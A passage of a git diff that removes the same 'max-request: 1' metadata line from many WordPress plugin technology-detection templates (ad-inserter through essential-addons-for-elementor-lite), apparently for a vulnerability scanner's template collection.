\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
